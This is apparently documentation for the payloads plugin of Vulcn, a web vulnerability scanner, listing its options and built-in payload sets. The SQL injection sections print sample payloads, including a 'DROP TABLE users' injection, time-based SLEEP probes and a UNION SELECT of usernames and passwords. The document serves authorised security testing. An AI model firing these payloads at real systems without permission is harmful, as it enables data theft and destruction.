Overview
The payloads plugin handles all payload loading for Vulcn:- Built-in payloads - 13 payload sets, 91 individual payloads
- PayloadsAllTheThings - Fetch from the popular repository
- Custom files - Load your own YAML/JSON payload files
Installation
The plugin is included with the CLI and loaded automatically.Configuration
Options
| Option | Type | Default | Description |
|---|---|---|---|
builtin | boolean | true | Include built-in payloads |
include | string[] | - | Only include these payload sets |
exclude | string[] | - | Exclude these payload sets |
payloadbox | string[] | - | Fetch from PayloadsAllTheThings |
files | string[] | - | Custom payload file paths |
Built-in Payload Sets
XSS Payloads
xss-basic (15 payloads)
xss-basic (15 payloads)
Basic XSS payloads with script tags and simple event handlers:
xss-event (12 payloads)
xss-event (12 payloads)
Event handler payloads:
xss-svg (8 payloads)
xss-svg (8 payloads)
SVG-based XSS payloads:
xss-polyglot (5 payloads)
xss-polyglot (5 payloads)
Polyglot payloads that work in multiple contexts:
SQL Injection Payloads
sqli-basic (10 payloads)
sqli-basic (10 payloads)
Basic SQL injection payloads:
' OR '1'='1 ' OR '1'='1' -- " OR "1"="1 1' OR '1'='1 1; DROP TABLE users-- ...sqli-error (8 payloads)
sqli-error (8 payloads)
Error-based SQL injection:
' AND 1=CONVERT(int,@@version)-- ' AND extractvalue(1,concat(0x7e,version()))-- ...sqli-blind (6 payloads)
sqli-blind (6 payloads)
Blind SQL injection (time-based):
' AND SLEEP(5)-- ' AND 1=1 AND SLEEP(5)-- 1' AND (SELECT SLEEP(5))-- ...sqli-union (5 payloads)
sqli-union (5 payloads)
UNION-based SQL injection:
' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT username,password FROM users-- ...Other Payloads
| Set | Count | Description |
|---|---|---|
ssrf-basic | 5 | Server-Side Request Forgery |
xxe-basic | 4 | XML External Entity |
cmd-basic | 6 | Command injection |
path-traversal | 8 | Directory traversal |
open-redirect | 4 | Open redirect |
PayloadsAllTheThings
Fetch payloads from PayloadsAllTheThings:| Type | Description |
|---|---|
xss | XSS payloads |
sql-injection | SQL injection payloads |
xxe | XXE payloads |
command-injection | Command injection payloads |
open-redirect | Open redirect payloads |
path-traversal | Path traversal payloads |